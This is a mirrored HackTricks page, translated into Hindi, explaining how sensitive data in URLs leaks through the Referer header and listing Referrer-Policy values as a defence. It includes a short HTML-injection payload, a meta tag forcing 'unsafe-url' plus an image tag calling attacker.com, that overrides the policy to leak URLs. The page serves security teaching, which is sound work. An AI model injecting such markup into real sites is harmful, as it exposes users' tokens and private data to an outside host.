Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00

Translator workflow 75e8745ba3 Translated to Hindi

2023-11-06 08:38:02 +00:00

6.7 KiB

Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति चाहिए? सदस्यता योजनाएं की जांच करें!
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
प्राप्त करें आधिकारिक PEASS & HackTricks swag
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
अपने हैकिंग ट्रिक्स साझा करें, hacktricks repo और hacktricks-cloud repo में PR जमा करके।

रेफरर हेडर और नीति

रेफरर वह हेडर है जिसे ब्राउज़र्स द्वारा पिछले दौरे गए पृष्ठ की सूचित करने के लिए उपयोग किया जाता है।

चुनौतीपूर्ण जानकारी लीक हो गई

यदि किसी वेब पृष्ठ के अंदर किसी भी संवेदनशील जानकारी को GET अनुरोध पैरामीटर में स्थानित किया जाता है, यदि पृष्ठ में बाहरी स्रोतों के लिंक होते हैं या किसी हमलावर्ती व्यक्ति को यह सुझाया जा सकता है (सामाजिक इंजीनियरिंग), तो वह हमलावर्ती व्यक्ति नवीनतम GET अनुरोध के अंदर संवेदनशील जानकारी को बाहर निकाल सकता है।

समाधान

आप ब्राउज़र को एक रेफरर-नीति का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से बचा सकती है:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

आप एक HTML मेटा टैग का उपयोग करके इस नियम को अधिलेखित कर सकते हैं (हमलावार को HTML इंजेक्शन का उपयोग करना होगा):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

रक्षा

कभी भी URL में GET पैरामीटर या पथ के अंदर कोई भी संवेदनशील डेटा न डालें।